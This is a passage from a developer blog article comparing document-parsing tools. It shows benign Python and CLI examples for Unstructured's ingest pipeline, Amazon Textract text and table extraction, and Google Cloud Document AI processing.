&lt;span class="c1"&gt;# Inspect a few elements
&lt;/span&gt;&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;el&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;elements&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
    &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nf"&gt;repr&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;el&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;category&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nf"&gt;str&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;el&lt;/span&gt;&lt;span class="p"&gt;)[:&lt;/span&gt;&lt;span class="mi"&gt;80&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;...&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You end up with a list of elements that know their category, which makes it easy to filter for titles, paragraphs or tables before you process them further.&lt;/p&gt;
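&lt;p&gt;As a small sketch of that filtering step, using stand-in elements rather than real Unstructured objects:&lt;/p&gt;

```python
from dataclasses import dataclass

@dataclass
class Element:
    """Stand-in for an Unstructured element; real ones also carry rich metadata."""
    category: str
    text: str

elements = [
    Element("Title", "LayoutParser: A Unified Toolkit"),
    Element("NarrativeText", "Recent advances in document analysis..."),
    Element("Table", "Model | Accuracy"),
]

# Keep only narrative text, e.g. before embedding it for search
narrative = [el.text for el in elements if el.category == "NarrativeText"]
print(narrative)
```

The same one-liner works on real Unstructured output, since each element exposes its category.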

&lt;h3&gt;
  
  
  Code Example: Batch processing with Ingest CLI
&lt;/h3&gt;

&lt;p&gt;For real projects you usually need to process many files at once and save the outputs somewhere. Unstructured ships an ingest CLI built for exactly that.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Chunk and partition an entire folder of files&lt;/span&gt;
unstructured-ingest &lt;span class="se"&gt;\&lt;/span&gt;
  &lt;span class="nb"&gt;local&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--input-path&lt;/span&gt; &lt;span class="nv"&gt;$LOCAL_FILE_INPUT_DIR&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--output-dir&lt;/span&gt; &lt;span class="nv"&gt;$LOCAL_FILE_OUTPUT_DIR&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--chunking-strategy&lt;/span&gt; by_title &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--chunk-max-characters&lt;/span&gt; 1024 &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--partition-by-api&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--api-key&lt;/span&gt; &lt;span class="nv"&gt;$UNSTRUCTURED_API_KEY&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--partition-endpoint&lt;/span&gt; &lt;span class="nv"&gt;$UNSTRUCTURED_API_URL&lt;/span&gt; &lt;span class="se"&gt;\&lt;/span&gt;
    &lt;span class="nt"&gt;--strategy&lt;/span&gt; hi_res
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This runs a full pipeline that reads documents from &lt;code&gt;LOCAL_FILE_INPUT_DIR&lt;/code&gt;, partitions them with the &lt;code&gt;hi_res&lt;/code&gt; strategy, chunks them by title and writes the structured outputs into your output directory. From there, you can index or analyze them however you like.&lt;/p&gt;

&lt;p&gt;Here's a quick API quickstart to get an idea. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/0EogKNU_BPU"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  &lt;a href="https://aws.amazon.com/textract/" rel="noopener noreferrer"&gt;4. Amazon Textract&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F23tu7ng9io04tkan6z4k.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F23tu7ng9io04tkan6z4k.png" alt="Amazon Textract"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Amazon Textract is AWS’s managed OCR and document analysis service that pulls text, handwriting, layout and structured data out of scanned documents and PDFs.&lt;/p&gt;

&lt;p&gt;It runs inside your AWS account, plugs into services like S3, Lambda, SNS and SQS, and is used at scale by companies like Paytm for document workflows.&lt;/p&gt;

&lt;h3&gt;
  
  
  Features
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Structured extraction&lt;/strong&gt; - Pulls data from tables, forms and key value pairs, not just plain text.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Layout and handwriting support&lt;/strong&gt; - Detects paragraphs, titles, layout elements and handwritten text in scans.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AWS integrations&lt;/strong&gt; - Works naturally with S3, Lambda, SNS, SQS and other AWS services.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Sync and async APIs&lt;/strong&gt; - Low latency calls for single pages plus batch jobs for large multipage docs.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Security and compliance&lt;/strong&gt; - Encryption, IAM and regional controls for regulated workloads.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Code Example: Detect text from a local file
&lt;/h3&gt;

&lt;p&gt;This is the basic pattern if you just want the text out of a document. You read the file as bytes, call &lt;code&gt;detect_document_text&lt;/code&gt; and print the lines Textract finds.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;

&lt;span class="n"&gt;textract&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;textract&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;  &lt;span class="c1"&gt;# uses your AWS credentials
&lt;/span&gt;
&lt;span class="n"&gt;file_path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;sample-doc.png&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;  &lt;span class="c1"&gt;# can be any image format
&lt;/span&gt;
&lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nf"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;file_path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;rb&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;image_bytes&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;read&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;textract&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;detect_document_text&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;Document&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Bytes&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;image_bytes&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;block&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Blocks&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;block&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;BlockType&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;LINE&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;block&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Text&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;What is happening here:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Textract analyzes the image or PDF and returns a list of Blocks that represent words, lines and other elements.&lt;/li&gt;
&lt;li&gt;You filter for blocks of type LINE and print their Text, which is enough for many basic OCR use cases or as a first step before sending text into an LLM.&lt;/li&gt;
&lt;/ul&gt;
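&lt;p&gt;Building on that, a tiny helper can join the &lt;code&gt;LINE&lt;/code&gt; blocks into one string before handing it to an LLM. The response below is a made-up, trimmed-down stand-in for a real Textract payload:&lt;/p&gt;

```python
def lines_to_text(response: dict) -> str:
    """Join Textract LINE blocks into a single newline-separated string."""
    return "\n".join(
        block["Text"]
        for block in response.get("Blocks", [])
        if block["BlockType"] == "LINE"
    )

# Hypothetical, trimmed-down response shape: real responses also
# include geometry, confidence scores and relationships
sample_response = {
    "Blocks": [
        {"BlockType": "PAGE"},
        {"BlockType": "LINE", "Text": "Invoice #001"},
        {"BlockType": "WORD", "Text": "Invoice"},
        {"BlockType": "LINE", "Text": "Total: $42.00"},
    ]
}

print(lines_to_text(sample_response))
```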

&lt;h3&gt;
  
  
  Code Example: Extract tables and forms from S3
&lt;/h3&gt;

&lt;p&gt;To pull structured data from forms and tables, you use &lt;code&gt;analyze_document&lt;/code&gt; with the &lt;code&gt;FORMS&lt;/code&gt; and &lt;code&gt;TABLES&lt;/code&gt; feature types and point Textract at a document in S3.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;

&lt;span class="n"&gt;textract&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;client&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;textract&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;bucket_name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;my-doc-bucket&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;span class="n"&gt;object_key&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;invoices/invoice-001.png&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

&lt;span class="n"&gt;response&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;textract&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;analyze_document&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;Document&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;S3Object&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Bucket&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;bucket_name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
            &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Name&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;object_key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;},&lt;/span&gt;
    &lt;span class="n"&gt;FeatureTypes&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;FORMS&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;TABLES&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Found &lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="nf"&gt;len&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Blocks&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt; blocks&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# Quick peek at found tables
&lt;/span&gt;&lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;block&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;response&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Blocks&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]:&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;block&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;BlockType&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;TABLE&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Detected a table with Id:&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;block&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Id&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;There is a lot of other complex stuff that you can do with Textract. For more details, check out the &lt;a href="https://docs.aws.amazon.com/textract/latest/dg/what-is-textract.html" rel="noopener noreferrer"&gt;Textract documentation&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;In production you usually wire this up with S3 triggers and Lambda so new documents are picked up and processed automatically.&lt;/p&gt;
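&lt;p&gt;As a minimal sketch of that wiring (the handler body still needs real AWS credentials to run; the event shape follows the standard S3 notification format):&lt;/p&gt;

```python
def bucket_and_key(event: dict) -> tuple[str, str]:
    """Extract the bucket name and object key from an S3 notification event."""
    record = event["Records"][0]["s3"]
    return record["bucket"]["name"], record["object"]["key"]

def handler(event, context):
    """Lambda entry point: OCR the newly uploaded object with Textract."""
    import boto3  # imported lazily; needs real AWS credentials at runtime
    bucket, key = bucket_and_key(event)
    textract = boto3.client("textract")
    response = textract.detect_document_text(
        Document={"S3Object": {"Bucket": bucket, "Name": key}}
    )
    return [b["Text"] for b in response["Blocks"] if b["BlockType"] == "LINE"]

# The event shape below mirrors the standard S3 notification format
sample_event = {
    "Records": [
        {"s3": {"bucket": {"name": "my-doc-bucket"}, "object": {"key": "scans/doc.png"}}}
    ]
}
print(bucket_and_key(sample_event))
```

Note that real S3 events URL-encode the object key, so production handlers usually decode it first.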

&lt;p&gt;Here's a quick intro to Amazon Textract. 👇&lt;/p&gt;

&lt;p&gt;

  &lt;iframe src="https://www.youtube.com/embed/5Cs4_e2CJRo"&gt;
  &lt;/iframe&gt;


&lt;/p&gt;




&lt;h2&gt;
  
  
  &lt;a href="https://cloud.google.com/document-ai" rel="noopener noreferrer"&gt;5. Google Cloud Document AI&lt;/a&gt;
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fztf6r43zpl0z6v5on0g1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fztf6r43zpl0z6v5on0g1.png" alt="Google Cloud Document AI"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Document AI is Google Cloud’s document stack that gives you ready-made processors for invoices, receipts, forms, IDs and general OCR. You pick a processor, send it a file and get back a &lt;code&gt;Document&lt;/code&gt; object with text, structure, entities and layout info, not just raw strings.&lt;/p&gt;

&lt;p&gt;The nice part is how it fits into the rest of GCP (Google Cloud Platform). You can drop files into Cloud Storage, trigger processing with Pub/Sub, Cloud Functions or Cloud Run, then push clean data into BigQuery or your app.&lt;/p&gt;

&lt;h3&gt;
  
  
  Use it when you want:
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Prebuilt processors&lt;/strong&gt; - invoice, receipt, form, ID and general OCR processors that work out of the box.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Tables and forms&lt;/strong&gt; - key value pairs and tables straight from scanned PDFs and images.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Custom models&lt;/strong&gt; - custom extractors, classifiers and splitters when your docs do not match the prebuilt ones.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cloud pipelines&lt;/strong&gt; - runs close to Cloud Storage, Cloud Run and Vertex AI so it is easy to wire into existing GCP setups.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Code Example: Send a PDF and read the text
&lt;/h3&gt;

&lt;p&gt;This is the usual Python flow. You create a processor in the console, grab its ID, then call it from your code.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;google.cloud&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;documentai&lt;/span&gt;

&lt;span class="n"&gt;project_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;your-project-id&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;span class="n"&gt;location&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;us&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;span class="n"&gt;processor_id&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;your-processor-id&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;
&lt;span class="n"&gt;file_path&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;path/to/document.pdf&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;

&lt;span class="n"&gt;client&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;documentai&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;DocumentProcessorServiceClient&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="n"&gt;name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;processor_path&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;project_id&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;location&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;processor_id&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="k"&gt;with&lt;/span&gt; &lt;span class="nf"&gt;open&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;file_path&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;rb&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;file_bytes&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;f&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;read&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;

&lt;span class="n"&gt;raw_document&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;documentai&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;RawDocument&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;content&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;file_bytes&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;mime_type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;application/pdf&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;request&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;documentai&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nc"&gt;ProcessRequest&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
    &lt;span class="n"&gt;raw_document&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;raw_document&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="n"&gt;result&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;process_document&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;request&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;doc&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;result&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;document&lt;/span&gt;

&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;doc&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;[:&lt;/span&gt;&lt;span class="mi"&gt;1000&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;You send raw bytes plus the MIME type; Document AI runs the selected processor and returns a &lt;code&gt;Document&lt;/code&gt; object. For quick use cases, grabbing &lt;code&gt;doc.text&lt;/code&gt; is enough.&lt;/p&gt;

&lt;h3&gt;
  
  
  Code Example: Turn a parsed form into fields
&lt;/h3&gt;

&lt;p&gt;If you use a form-style processor, Document AI already marks fields as key-value pairs, which you can loop over and map into your own schema.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;clean&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;-&amp;gt;&lt;/span&gt; &lt;span class="nb"&gt;str&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
